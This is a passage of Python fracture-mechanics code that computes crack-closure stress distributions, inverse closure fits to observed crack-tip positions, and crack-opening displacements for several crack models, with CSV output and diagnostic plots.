external loading increment required to close crack at x[xt_idx-1] delta_sigma_ext = - tensile_displ[xt_idx-1]/du_dsigma # sigmaext is starting load (negative for compression) # sigmaext2 is the ending load (negative for compression, # more negative than sigmaext1 sigmaext2 = sigmaext + delta_sigma_ext F = -delta_sigma_ext/(use_xt2-use_xt1) # F is positive... measures closure gradient # integral_compressivestress_shrinking_effective_crack_length_byxt recalculates # sigmaext2 internally, but result will match our value to machine precision (icseclb_use_xt1,icseclb_sigmaext2,sigma_increment) = integral_compressivestress_shrinking_effective_crack_length_byxt(x,sigmaext,sigmaext_max,F,use_xt1,use_xt2,crack_model) incremental_displacement = np.zeros(x.shape[0],dtype='d') xt = x[xt_idx] # (use_xt1+use_xt2)/2.0 left_of_effective_tip = (x < xt) incremental_displacement[left_of_effective_tip] = tensile_displacement(sigmaext2-sigmaext,x[left_of_effective_tip],xt,crack_model) tensile_closure[xt_idx] = sigma_increment[xt_idx] # extract tensile_closure value for this point # Add in effects of this step sigma+=sigma_increment tensile_displ += incremental_displacement assert(abs(tensile_displ[xt_idx-1]) < 1e-12) # Verify that ultimate displacement of our point-to-the-left is what it was supposed to be # increment to next step sigmaext = sigmaext2 xt_idx-=1 pass # in the final state, sigma + tensile_closure superimpose return tensile_closure def crackopening_from_tensile_closure(x,x_bnd,sigma_closure,dx,a,sigma_yield,crack_model): """Based on the assumed closure model, whereby we give a meaning to "tensile" closure stresses -- based on the compressive loading required to close the crack to that point -- we can determine an opening profile for the unloaded crack. This function calculates that crack opening... Note that this gives the half-opening as opposed to the full-opening used in softclosure.py""" sigmaext_max=-np.inf # as much external compression as we need (sigmaext,sigma,tensile_displ,xt_idx,use_xt2,use_xt1) = initialize_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True) done=False #if sigmaext==sigmaext_max: # # Used up all of our applied load... Done! # done=True # pass while not done: (use_xt1,sigmaext, sigma, tensile_displ, dsigmaext_dxt) = solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=True) if use_xt1 <= 0.0: # Used up all of our crack... Done! done=True pass #if verbose: # #Print what is happening in the loop # print("Step: %d @ x=%f mm: %f MPa of compression held" % (xt_idx,x[xt_idx]*1e3,-sigmaext/1e6)) # if calculate_displacements: # print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) # pass # pass xt_idx-=1 use_xt2=use_xt1 if not done: assert(x_bnd[xt_idx+1]==use_xt2) pass pass return -tensile_displ def solve_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=False, diag_plots=False,calculate_displacements=True): #####MAIN SUPERPOSITION LOOP (sigmaext,sigma,tensile_displ,xt_idx,use_xt2,use_xt1) = initialize_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements) #assert((sigma <= 0.0).all()) done=False #if sigmaext==sigmaext_max: # # Used up all of our applied load... Done! 
# done=True # pass dsigmaext_dxt = np.ones(x.shape,dtype='d')*np.nan # dsigmaext_dxt is a measure of the distributed stress concentration while not done and sigmaext > sigmaext_max: (use_xt1,sigmaext, sigma, tensile_displ, dsigmaext_dxt[xt_idx]) = solve_incremental_compressivestress(x,x_bnd,sigma,sigma_closure,tensile_displ,use_xt2,xt_idx,dx,sigmaext,sigmaext_max,a,sigma_yield,crack_model,calculate_displacements=calculate_displacements) if use_xt1 > x_bnd[xt_idx] or sigmaext==sigmaext_max or use_xt1 <= 0.0: # Used up all of our applied load or all of our crack... Done! done=True pass if verbose: #Print what is happening in the loop print("Step: %d @ x=%f mm: %f MPa of compression held" % (xt_idx,x[xt_idx]*1e3,-sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass if not done: # loop back #assert(x_bnd[xt_idx+1]==use_xt2) xt_idx-=1 use_xt2=use_xt1 pass pass if use_xt1 <= 0.0: # We closed the crack fully without accepting # the full external load. # ... Apply the remaining load increment, # which will be held uniformly across the sample if not np.isinf(sigmaext_max): uniform_tension = (sigmaext_max-sigmaext) # negative number sigma += uniform_tension sigmaext += uniform_tension #assert((sigma <= 0.0).all()) if verbose: print("Step: Closed to center: %f MPa of compression held" % (sigmaext/1e6)) if calculate_displacements: print("Tensile displacement @ x=%f mm: %f nm" % (x[0]*1e3, tensile_displ[0]*1e9)) pass pass pass pass #assert((sigma <= 0.0).all()) #sigma_with_sigma_closure=sigma-sigma_closure*(x > use_xt1)*(x <= a) # sigma_closure only contributes after the effective tip sigma_with_sigma_closure=sigma.copy() # sigma_closure should be superimposed with the # external load effect sigma over the entire region # where the crack is closed. # this is presumbly true everywhere beyond the current segment up to the crack length a WE SHOULD PROBABLY DEAL BETTER WITH THE LAST SEGMENT AT THE TIP! sigma_with_sigma_closure[(xt_idx+1):][x[(xt_idx+1):] <= a] -= sigma_closure[xt_idx+1:][x[(xt_idx+1):] <= a] # The current segment (indexd by xt_idx) may be partial, # so weight it according to the portion that is actually closed sigma_with_sigma_closure[xt_idx] -= sigma_closure[xt_idx]*(use_xt2-use_xt1)/dx; # correct any small residual tension if sigma_with_sigma_closure[xt_idx] > 0.0: sigma_with_sigma_closure[xt_idx]=0.0 pass #assert((sigma_with_sigma_closure <= 0.0).all()) return (use_xt1, sigma_with_sigma_closure, tensile_displ, dsigmaext_dxt) def solve_normalstress(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=False, diag_plots=False,calculate_displacements=True): """NOTE: sigma_closure is positive compressive; pretty much everything else is positive tensile. NOTE: Modified to return a sigma that is a physical contact stress, INCLUDING the effect of sigma_closure """ if sigmaext_max >= 0.0: return solve_normalstress_tensile(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=verbose,diag_plots=diag_plots,calculate_displacements=calculate_displacements) else: return solve_normalstress_compressive(x,x_bnd,sigma_closure,dx,sigmaext_max,a,sigma_yield,crack_model,verbose=verbose,diag_plots=diag_plots,calculate_displacements=calculate_displacements) pass def inverse_closure(reff,seff,x,x_bnd,dx,xt,sigma_yield,crack_model,verbose=False): """ Given effective crack lengths reff at externally applied loads seff, calculate a closure stress field that produces such a field. 
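A hedged usage sketch (every number here is an illustrative assumption, not a recommended value; the crack model construction follows ModeI_throughcrack_CODformula defined later in this file):

    import numpy as np
    E = 200e9; nu = 0.3; sigma_yield = 400e6           # assumed material values
    crack_model = ModeI_throughcrack_CODformula(E/(1.0-nu**2.0), Symmetric_COD=True)
    a = 2e-3                                           # physical half-length (m)
    x_bnd = np.linspace(0.0, 4e-3, 201)                # cell boundaries
    dx = x_bnd[1]-x_bnd[0]
    x = (x_bnd[:-1]+x_bnd[1:])/2.0                     # cell centers
    reff = np.array([0.5e-3, 1.0e-3, 1.5e-3, 2.0e-3])  # measured effective tip positions (m)
    seff = np.array([10e6, 25e6, 45e6, 70e6])          # corresponding external loads (Pa)
    sigma_closure = inverse_closure(reff, seff, x, x_bnd, dx, a,
                                    sigma_yield, crack_model)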
reff,seff presumed to be ordered from most compressive to most tensile. seff is positive for tensile opening loads returns sigma_closure that is positive for compressive closure stresses. """ sigma_closure = np.zeros(x.shape,dtype='d') last_closure = seff[0] # If everything is closed, then closure stresses and external loads match. last_reff = reff[0] firstiteration=True # NOTE: Always iterate starting at step 1, then back to 0 # then back to 1, then increasing. # The reason for this is to get a reasonable extrapolation # to the left of the given data. # # Basically, the first iteration at step 1 uses # seff[0] as an approximation for the closure state # from the (non-executed) step 0. # Then execute step 0 based on that initial result to get # a slope we can extrapolate (don't allow the slope to be negative... # if it would be, just make it zero -- straight horizontal) # all the way to the crack center. # Once this is done, rerun step 1 based on the step zero # result and continue from there. for lcnt in [1,0]+list(range(1,reff.shape[0])): # In each step, we solve for a new linear segment # of the sigma_closure distribution. # we assume last_closure is the end closure stress # from the previous step, corresponding to a # position of reff[lcnt-1], with an # external load of seff[lcnt-1] opening the # crack to this point #print("lcnt=%d" % (lcnt)) #if lcnt==7: # import pdb # pdb.set_trace() # pass # So at this step, if the new closure stress is # new_closure, then # in between we have a line: # sigma_closure(x) = last_closure + (new_closure-last_closure)*(x-reff[lcnt-1]) # So we need to iteratively solve for a new_closure that satisfies # (reff[lcnt], sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure,dx,seff[lcnt],a,sigma_yield,crack_model) # For the given reff[lcnt], seff[lcnt] #if reff[lcnt] < last_reff+dx/10.0: # # if the opening step is too small, skip this iteration # # to avoid dividing by zero # continue if lcnt==1 and firstiteration: # first iteration: extrapolate back to crack center # if necessary ***!!!! May want to fix this #new_zone = (x_bnd[:-1] <= reff[lcnt]) # providing closure stresses to right of closure point is useful # because intermediate calculations may examine more open cases, # and having nice behavior here improves convergence new_zone=np.ones(x.shape,dtype=np.bool) #new_zone = (x_bnd[1:] >= reff[lcnt]) #open_zone = (x_bnd[1:] < reff[lcnt]) pass elif lcnt==0: # Iteration at position zero after initialization at lcnt==1 #new_zone = (x_bnd[1:] < reff[lcnt]) new_zone=np.ones(x.shape,dtype=np.bool) if np.count_nonzero(new_zone)==0: # nothing to do continue zone_following = (x_bnd[1:] >= reff[lcnt+1]) zone_following_start = np.where(zone_following)[0][0] pass else: #new_zone = (x_bnd[1:] >= reff[lcnt-1]) & (x_bnd[:-1] <= reff[lcnt]) #new_zone = (x_bnd[1:] >= reff[lcnt-1]) new_zone = (x_bnd[1:] >= last_reff) pass if lcnt != 0: # (these values are not used for lcnt==0) zone_start = np.where(x_bnd[1:] >= last_reff)[0][0] zone_end = np.where(x_bnd[:-1] <= reff[lcnt])[0][-1] zone_prev = max(0,zone_start-1) pass #print("np.where(new_zone) = %s" % (str(np.where(new_zone)))) def goal(new_closure): new_closure_field = copy.copy(sigma_closure) # WARNING: All changes that affect new_closure_field in goal() # MUST ALSO BE APPLIED to generating sigma_closure after the optimization !!! 
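# Hedged numeric illustration (toy values) of the linear closure segment
# constructed below: with sigma_closure[zone_prev] = 20 MPa at x = 1.0 mm and
# a trial new_closure of 50 MPa at x = 2.0 mm, the point x = 1.5 mm receives
#   20e6 + (50e6 - 20e6)*(1.5e-3 - 1.0e-3)/(2.0e-3 - 1.0e-3) = 35e6 Pa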
if lcnt==1 and firstiteration: new_closure_field[new_zone] = seff[0] + (new_closure-seff[0]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev]) pass elif lcnt==0: if new_closure >= sigma_closure[zone_following_start]: # use straight horizontal new_closure_field[new_zone] = new_closure pass else: # Connect with slope new_closure_field[new_zone] = sigma_closure[zone_following_start] + (new_closure-sigma_closure[zone_following_start]) * (x[new_zone]-x[zone_following_start])/(0.0-x[zone_following_start]) pass pass else: # draw straight line between zone_prev and new_zone. Use np.max() to prevent new_closure_field from being negative. new_closure_field[new_zone] = np.max((np.zeros(np.count_nonzero(new_zone),dtype='d'),sigma_closure[zone_prev] + (new_closure-sigma_closure[zone_prev]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev])),axis=0) pass (gotreff, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,new_closure_field,dx,seff[lcnt],xt,sigma_yield,crack_model,calculate_displacements=False,verbose=verbose) return gotreff-reff[lcnt] if lcnt==0: # For position 0, resulting solution # may be less than seff[0] or even negative max_sol_attempts=300 first_initialization_factor=0.03 initialization_scale_factor=-1.05 seed=max(abs(seff[-1]-seff[0]),seff[0],np.mean(seff)) pass else: max_sol_attempts=20 first_initialization_factor=1.0 initialization_scale_factor=1.1 seed = seff[lcnt] pass solvecnt=0 if lcnt > 1 and not firstiteration and goal(-np.inf) < 0.0: # Applying # no increment isn't enough to get # it to open this far under this load... # Use the most extreme value possible new_closure = -np.inf pass else: inifactor=first_initialization_factor while solvecnt < max_sol_attempts: (new_closure,infodict,ier,mesg) = scipy.optimize.fsolve(goal,seed*inifactor,full_output=True) #print("ier=%d; new_closure=%g" % (ier,new_closure[0])) if ier==1: break inifactor*=initialization_scale_factor solvecnt+=1 pass if ier != 1: if lcnt > 0 and last_reff >= xt-dx/4.0: # if we don't converge and previous step was within # a quarter-step of the end, claim we are good # and quit. break sys.modules["__main__"].__dict__.update(globals()) sys.modules["__main__"].__dict__.update(locals()) raise ValueError("Error in inverse_closure fsolve: %s" % str(mesg)) pass #closure_gradient = (sigma_closure[zone_end]-sigma_closure[zone_start])/(x[zone_end]-x[zone_start]) # WARNING: All changes that affect sigma_closure here # MUST ALSO BE APPLIED to generating new_closure_field in goal()!!! if lcnt==1 and firstiteration: sigma_closure[new_zone] = seff[0] + (new_closure-seff[0]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev]) pass elif lcnt==0: if new_closure >= sigma_closure[zone_following_start]: # use straight horizontal sigma_closure[new_zone] = new_closure pass else: # Connect with slope sigma_closure[new_zone] = sigma_closure[zone_following_start] + (new_closure-sigma_closure[zone_following_start]) * (x[new_zone]-x[zone_following_start])/(0.0-x[zone_following_start]) pass pass else: # draw straight line between zone_prev and new_zone. Use np.max() to prevent sigma_closure from being negative. 
sigma_closure[new_zone] = np.max((np.zeros(np.count_nonzero(new_zone),dtype='d'),sigma_closure[zone_prev] + (new_closure-sigma_closure[zone_prev]) * (x[new_zone]-x[zone_prev])/(x[zone_end]-x[zone_prev])),axis=0) pass #print("sigma_closures %s" % (str(sigma_closure))) #print("new_zone closures: %s" % (str(sigma_closure[new_zone][:2]))) firstiteration=False last_closure = new_closure last_reff = reff[lcnt] pass #if reff[lcnt] < xt: # # don't have data out to the tips # # extrapolate last closure gradient to the tips # # new_zone = (x_bnd > reff[lcnt]) # zone_start = np.where(new_zone)[0] # zone_end = np.where # new_closure=last_closure + closure_gradient * (xt-x[zone_start]) # # sigma_closure[new_zone] = last_closure + (new_closure-last_closure) * (x[new_zone]-reff[lcnt])/(xt-reff[lcnt]) # # pass sigma_closure[x > xt] = 0.0 ## Extrapolate first to points back to the origin (open zone #first_closure_index = np.where(~open_zone)[0][0] #initial_slope = (sigma_closure[first_closure_index+1]-sigma_closure[first_closure_index])/dx #sigma_closure[open_zone] = sigma_closure[first_closure_index] + (x[open_zone]-x[first_closure_index])*initial_slope return sigma_closure def inverse_closure_backwards_broken(reff,seff,x,x_bnd,dx,xt,sigma_yield,crack_model,verbose=False): """ Given effective crack lengths reff at externally applied loads seff, calculate a closure stress field that produces such a field. reff,seff presumed to be ordered from most compressive to most tensile. seff is positive for tensile opening loads returns sigma_closure that is positive for compressive closure stresses. if seff[0] is > 0, and reff[0] > 0 then sigma_closure corresponding to reff[0] is assumed to match seff[0]. NOTE: This version implements it backwards (tip to center) and is broken """ assert((np.diff(seff) > 0).all()) # for a crack with no closure stresses, even an epsilon # tensile opening causes the crack to open to the tips. # We work back from the tips. # at the last, radius, stress combination # there is no load on the crack surface except past # that last radius. # # sigma_closure is positive compression. sigma_closure = np.zeros(x.shape,dtype='d') last_r = xt last_closure = None for lcnt in range(reff.shape[0]-1,-1,-1): # In each step, we solve for a new linear segment # of the sigma_closure distribution. # we assume last_closure is the end closure stress # from the previous step, corresponding to a # position of reff[lcnt+1], with an # external load of seff[lcnt+1] opening the # crack to this point # So at this step, if the new closure stress is # new_closure, then # in between we have a line: # sigma_closure(x) = last_closure + (new_closure-last_closure)*(x-reff[lcnt+1]) # So we need to iteratively solve for a new_closure that satisfies # (reff[lcnt], sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure,dx,seff[lcnt],a,sigma_yield,crack_model) # For the given reff[lcnt], seff[lcnt] if lcnt==reff.shape[0]-1: # first iteration: Don't know stress to open to tip # (unless this is tip!) 
#new_zone = (x >= reff[lcnt]) & (x <= xt) new_zone = (x_bnd[1:] >= reff[lcnt]) & (x_bnd[:-1] <= xt) pass else: new_zone = (x_bnd[1:] >= reff[lcnt]) & (x_bnd[:-1] <= reff[lcnt+1]) #new_zone = (x >= reff[lcnt]) & (x < reff[lcnt+1]) pass def goal(new_closure): new_closure_field = copy.copy(sigma_closure) if last_closure is not None: new_closure_field[new_zone] = last_closure + (new_closure-last_closure) * (reff[lcnt+1]-x[new_zone])/(reff[lcnt+1]-reff[lcnt]) # slope # slope pass else: new_closure_field[new_zone] = new_closure # Horizontal line pass (gotreff, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,new_closure_field,dx,seff[lcnt],xt,sigma_yield,crack_model,calculate_displacements=False,verbose=verbose) return gotreff-reff[lcnt] if reff[lcnt] < last_r and np.count_nonzero(new_zone) > 0: (new_closure,infodict,ier,mesg) = scipy.optimize.fsolve(goal,seff[lcnt]*3.4,full_output=True) if ier != 1: sys.modules["__main__"].__dict__.update(globals()) sys.modules["__main__"].__dict__.update(locals()) raise ValueError("Error in inverse_closure fsolve: %s" % str(mesg)) if last_closure is not None: sigma_closure[new_zone] = last_closure + (new_closure-last_closure) * (reff[lcnt+1]-x[new_zone])/(reff[lcnt+1]-reff[lcnt]) # slope pass else: sigma_closure[new_zone] = new_closure # Horizontal line pass last_closure = new_closure last_r = reff[lcnt] pass pass #if reff[lcnt] < xt: # # don't have data out to the tips # # extrapolate last closure gradient to the tips # # new_zone = (x >= reff[lcnt]) # new_closure=last_closure + closure_gradient * (xt-reff[lcnt]) # # sigma_closure[new_zone] = last_closure + (new_closure-last_closure) * (x[new_zone]-reff[lcnt])/(xt-reff[lcnt]) # # pass sigma_closure[x > xt] = 0.0 return sigma_closure class Glinka_ModeI_ThroughCrack(ModeI_Beta_WeightFunction): """Create and return ModeI_crack_model corresponding to the Through crack weight function from the Glinka paper""" def __init__(self,Eeff,x,width,epsx): def weightfun_through_times_sqrt_aminx(x, a, w): # Weight function (stress intensity factor resulting from point load on crack surface) for a through crack or tunnel crack # reference: Glinka, G. "Development of weight functions and computer integration procedures for calculating stress intensity factors around cracks subjected to complex stress fields." Stress and Fatigue-Fracture Design, Petersburg Ontario, Canada, Progress Report 1.1 (1996): 1. # x=position, # a=half-crack length (not always physical total length, but may be an effective length for partially closed crack) # w=half-width of geometry (same axis as x and a) M1 = 0.06987 + 0.40117*(a/w) - 5.5407*(a/w)**2.0 + 50.0886*(a/w)**3.0 - 200.699*(a/w)**4.0 + 395.552*(a/w)**5.0 - 377.939*(a/w)**6.0 + 140.218*(a/w)**7.0 M2 = 0.09049 - 2.14886*(a/w) + 22.5325*(a/w)**2.0 - 89.6553*(a/w)**3.0 + 210.599*(a/w)**4.0 - 239.445*(a/w)**5.0 + 111.128*(a/w)**6.0 M3 = 0.427216 + 2.56001*(a/w) - 29.6349*(a/w)**2.0 + 138.40*(a/w)**3.0 - 347.255*(a/w)**4.0 + 457.128*(a/w)**5.0 - 295.882*(a/w)**6.0 + 68.1575*(a/w)**7.0 return (2.0/np.sqrt(2*np.pi))*(1.0+M1*np.sqrt(1.0-x/a)+M2*(1.0-x/a)+M3*(1.0-x/a)**1.5) super(Glinka_ModeI_ThroughCrack, self).__init__( weightfun_times_sqrt_aminx=lambda obj,x,a: weightfun_through_times_sqrt_aminx(x,a,width), epsx=epsx, Eeff=Eeff, surrogate_a=x, use_surrogate=True) pass pass def ModeI_throughcrack_weightfun(Eeff,x,epsx): ## Basic weight function from Fett & Munz Stress Intensity Factors and Weight Functions eq.
1.2.5 # Equivalent to # Basic weight function from Anderson, Fracture Mechanics, Example 2.6 (page 57) # Weight function given as h(x) = \pm (1/sqrt(pi*a)) * sqrt(x/(2a-x)) # ... But the coordinate frame is weird. From Fig 2.27 on page 58, # x=0 is at the other end of the crack (!) versus our origin is # the center of the crack. Let x' = x-a -> x=x'+a # Now h(x') = \pm (1/sqrt(pi*a)) * sqrt((x'+a)/(2a-x'-a)) # h(x') = \pm (1/sqrt(pi*a)) * sqrt((x'+a)/(a-x')) # #def weightfun_basic_times_sqrt_aminx(x,a): # return np.sqrt(1.0/(np.pi*a))*np.sqrt((a+x)) # Corrected for origin being at center of crack, not tip. # See corrected_tunnelcrack_weightfun.pdf def weightfun_basic_times_sqrt_aminx(x,a): return (1.0/np.sqrt(np.pi))*np.sqrt(a)/np.sqrt(a+x) return ModeI_Beta_WeightFunction(weightfun_times_sqrt_aminx=lambda obj,x,a: weightfun_basic_times_sqrt_aminx(x,a), epsx=epsx, Eeff=Eeff, surrogate_a=x, use_surrogate=True) class ModeI_throughcrack_CODformula(ModeI_Beta_COD_Formula): Symmetric_COD = None def r0_over_a(self,xt): """ The baseline approximation of the stress field beyond the crack tip is K/sqrt(2*pi*r), but this is only valid within perhaps a/10 of the tip. Initially we approximated the stress field as K/sqrt(2*pi*r) + sigma_infty so that the stress would approach the correct value as r -> infty. Unfortunately this doesn't satisfy force balance (in fact if you integrate it, it fails to converge!). So our fix is to approximate the stress field as (K/sqrt(2*pi*r))*(r0^2/(r+r0)^2) + sigma_infty, where r0 is selected to satisfy force balance between the load not held over the cracked region and the stress concentration beyond the tip. r0 is the characteristic radius for the 1/r^2 decay of the 1/sqrt(r) term Assuming K has the form sigma*sqrt(pi*a*beta) for a through crack in a thin plate, then per total_load_matching_crossterm_r2_work.pdf r0 = 8a/(pi^2*beta) """ return 8.0/((np.pi**2.0)*self.beta(self)) def __init__(self,Eeff,Symmetric_COD): """Eeff is the effective modulus (just E for plane stress, E/(1-nu^2) for plane strain) Symmetric_COD should be True or False depending on whether you want to use the crack-center symmetric (elliptical displacement) form of the COD expression (suitable for a 2-sided crack) or the asymmetric form (suitable for an edge crack)""" self.Symmetric_COD=Symmetric_COD def u_per_unit_stress(Eeff,x,xt): # half-opening displacement over sigma_applied # Non weightfunction method: # Old method: Based on Suresh eq. 9.45. # The problem with the old method is it is based # on a near-tip approximation #Kappa = (3.0-nu)/(1.0+nu) # #KI = sigma_applied*np.sqrt(np.pi*(xt)) #theta = np.pi #u = (KI/(2.0*E))*(np.sqrt((xt-x)/(2.0*np.pi)))*((1.0+nu)* # (((2.0*Kappa+1.0)*(np.sin(theta/2.0)))-np.sin(3.0*theta/2.0))) # New Method: Based on Anderson, eq. 
A2.43 (Symmetric_COD) # uy = 2(sigma/Eeff)*sqrt(a^2-x^2) # uy = 2(sigma/Eeff)*sqrt((a+x)(a-x)) #Eeff = E if Symmetric_COD: # Anderson, eq A2.43 u_per_unit_stress = (2/Eeff)*np.sqrt((xt+x)*(xt-x)) pass else: # Anderson, table 2.2: # uy = (KI/(2mu)) sqrt((xt-x)/(2pi)) (kappa + 1) # kappa = (3-nu)/(1+nu) (plane stress) # kappa = (3-4nu) (plane strain) # so kappa + 1 = # kappa + 1 = (3-nu +1 +nu)/(1+nu) # = 4/(1+nu) (plane stress) # kappa + 1 = 4(1-nu) plane strain # # and mu = E/(2*(1+nu)) # so # uy = (KI/E) (1+nu) sqrt((xt-x)/(2pi)) (4/(1+nu)) (plane stress) # uy = 4 * (KI/E) sqrt((xt-x)/(2pi)) (plane stress) # uy = (KI/E) (1+nu) sqrt((xt-x)/(2pi)) 4(1-nu) (plane strain) # uy = 4 * (KI/E) sqrt((xt-x)/(2pi)) * (1+nu)(1-nu) (plane strain) # uy = 4 * (KI/E) sqrt((xt-x)/(2pi)) * (1-nu^2) (plane strain) # letting Eeff = E (plane stress) or Eeff = E/(1-nu^2) (plane strain), # uy = 4 * (KI/Eeff) sqrt((xt-x)/(2pi)) # where KI = sigma_inf *sqrt(pi*xt*beta) (beta=1 in this case) # so u_per_unit_stress = (4*sqrt(pi*xt)/Eeff) * sqrt((xt-x)/(2pi)) # u_per_unit_stress = (4*sqrt(a)/Eeff) * sqrt((xt-x)/(2)) u_per_unit_stress = (4.0*np.sqrt(xt)/Eeff)*np.sqrt((xt-x)/2.0) pass return u_per_unit_stress super(ModeI_throughcrack_CODformula, self).__init__(Eeff=Eeff, beta=lambda obj: 1.0, u_per_unit_stress = lambda obj,x,xt: u_per_unit_stress(obj.Eeff,x,xt)) pass pass class Tada_ModeI_CircularCrack_along_midline(ModeI_Beta_COD_Formula): def r0_over_a(self,xt): """Based on calculation given in total_load_matching_crossterm_r2_work.pdf """ return (2.0**(1.0/3.0))/((np.pi**(2.0/3.0))*(self.beta(self)**(1.0/3.0))) def __init__(self,E,nu): def u_per_unit_stress(E,nu,x,xt): # half opening displacement # For a circular crack in an infinite space, # loaded in mode I. # We will be evaluating along a line through the crack center # Based on ., ., & . (2000). The stress analysis of cracks handbook / , , . (3rd ed.). New York: ASME Press. 
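            # i.e. for a penny-shaped (circular) crack of radius xt in an infinite body under
            # uniform remote tension sigma, the half-opening along a diameter is
            #   u = (4*(1-nu^2)*sigma/(pi*E)) * sqrt(xt^2 - x^2),
            # so dividing through by sigma gives the u_per_unit_stress expression below.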
u_per_unit_stress = (4.0*(1-nu**2.0)/(np.pi*E)) * np.sqrt(xt**2.0 - x**2.0) return u_per_unit_stress super(Tada_ModeI_CircularCrack_along_midline, self).__init__(E=E, nu=nu, beta=lambda obj: 4.0/(np.pi**2.0), u_per_unit_stress = lambda obj,x,xt: u_per_unit_stress(obj.E,obj.nu,x,xt)) pass pass def perform_inverse_closure(inputfilename,E,nu,sigma_yield,CrackCenterX,dx,specimen_id,hascrackside1=True,hascrackside2=True): from matplotlib import pyplot as pl import pandas as pd #tau_yield = sigma_yield/2.0 # limits stress concentration around singularity # read closure profile cpdata = pd.read_csv(inputfilename,index_col="Opening load (Pa)") loads = np.array(cpdata.index) tippos_side1 = None tippos_side2 = None if "xt (side 1, m)" in cpdata: tippos_side1 = np.array(cpdata["xt (side 1, m)"]) assert(hascrackside1) pass if "xt (side 2, m)" in cpdata: tippos_side2 = np.array(cpdata["xt (side 2, m)"]) assert(hascrackside2) pass #cpdata = np.loadtxt(inputfilename,skiprows=1,delimiter=',') #assert(cpdata.shape[1]==3) #loads = cpdata[:,0] #tippos_side1 = cpdata[:,1] #tippos_side2 = cpdata[:,2] sigmaext_max=np.max(loads) a_side1=0.0 a_side2=0.0 # side 1 (left side) if tippos_side1 is not None: observed_reff_side1 = CrackCenterX - tippos_side1 observed_seff_side1 = loads a_side1=np.max(observed_reff_side1) pass # side 2 (right side) if tippos_side2 is not None: observed_reff_side2 = tippos_side2 - CrackCenterX observed_seff_side2 = loads a_side2=np.max(observed_reff_side2) pass # here, x really measures radius past crack center xmax_approx = 2.0*max(a_side1,a_side2) # x array goes past tip position (twice half-length) #dx = 25e-6 xsteps = int(xmax_approx//dx) xmax = dx*xsteps x_bnd=np.arange(xsteps,dtype='d')*dx x = (x_bnd[1:]+x_bnd[:-1])/2.0 #weightfun_epsx = dx/8.0 crack_model = Tada_ModeI_CircularCrack_along_midline(E,nu) sigma_closure_side1 = None sigma_closure_side2 = None if tippos_side1 is not None: sigma_closure_side1 = inverse_closure(observed_reff_side1[observed_reff_side1 >= 0.0], observed_seff_side1[observed_reff_side1 >= 0.0], x,x_bnd,dx,a_side1,sigma_yield, crack_model) pass if tippos_side2 is not None: sigma_closure_side2 = inverse_closure(observed_reff_side2[observed_reff_side2 >= 0.0], observed_seff_side2[observed_reff_side2 >= 0.0], x,x_bnd,dx,a_side2,sigma_yield, crack_model) pass side1fig = None side2fig = None # Forward cross-check of closure if tippos_side1 is not None: side1fig=pl.figure() pl.plot(x[x < a_side1]*1e6,sigma_closure_side1[x < a_side1]/1e6,'-', observed_reff_side1*1e6,observed_seff_side1/1e6,'x') for observcnt in range(len(observed_reff_side1)): (effective_length, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure_side1,dx,observed_seff_side1[observcnt],a_side1,sigma_yield,crack_model) pl.plot(effective_length*1e6,observed_seff_side1[observcnt]/1e6,'.') #pl.plot(x*1e3,tensile_displ*1e15,'-') pass pl.grid() pl.legend(('Closure stress field','Observed crack tip posn','Recon. 
crack tip posn'),loc="best") pl.xlabel('Radius from crack center (um)') pl.ylabel('Stress (MPa)') if specimen_id is not None: pl.title('%s: Side 1 (left)' % (specimen_id)) pass else: pl.title('Side 1 (left)') pass side2fig=pl.figure() pl.plot(x[x < a_side2]*1e6,sigma_closure_side2[x < a_side2]/1e6,'-', observed_reff_side2*1e6,observed_seff_side2/1e6,'x') for observcnt in range(len(observed_reff_side2)): (effective_length, sigma, tensile_displ, dsigmaext_dxt) = solve_normalstress(x,x_bnd,sigma_closure_side2,dx,observed_seff_side2[observcnt],a_side2,sigma_yield,crack_model) pl.plot(effective_length*1e6,observed_seff_side2[observcnt]/1e6,'.') #pl.plot(x*1e3,tensile_displ*1e15,'-') pass pl.grid() pl.legend(('Closure stress field','Observed crack tip posn','Recon. crack tip posn'),loc="best") if specimen_id is not None: pl.title('%s: Side 2 (right)' % (specimen_id)) pass else: pl.title('Side 2 (right)') pass pl.xlabel('Radius from crack center (um)') pl.ylabel('Stress (MPa)') pass return (x,x_bnd,a_side1,a_side2,sigma_closure_side1,sigma_closure_side2,side1fig,side2fig) def save_closurestress(filename,x,sigma_closure,a,crackopening=None): """ NOTE: crackopening should be the half-crackopening!!!""" import pandas as pd nrows = np.count_nonzero(x <= a)+1 out_frame = pd.DataFrame(index=pd.Float64Index(data=x[:nrows],dtype='d',name="Crack radius (m) compared to crack (half) length a=%.8g m" % (a))) out_frame.insert(len(out_frame.columns),"Closure stress (Pa)", sigma_closure[:nrows]) if crackopening is not None: out_frame.insert(len(out_frame.columns),"Crack opening (m)", crackopening[:nrows]) pass out_frame.to_csv(filename) # #with open(filename,"wb") as csvfile: # cpwriter = csv.writer(csvfile) # columntitles = ["Crack radius (m)","Closure stress (Pa)"] # if crackopening is not None: # columntitles.append("Crack opening (m)") # pass # cpwriter.writerow(columntitles) # # if crackopening is None: # for poscnt in 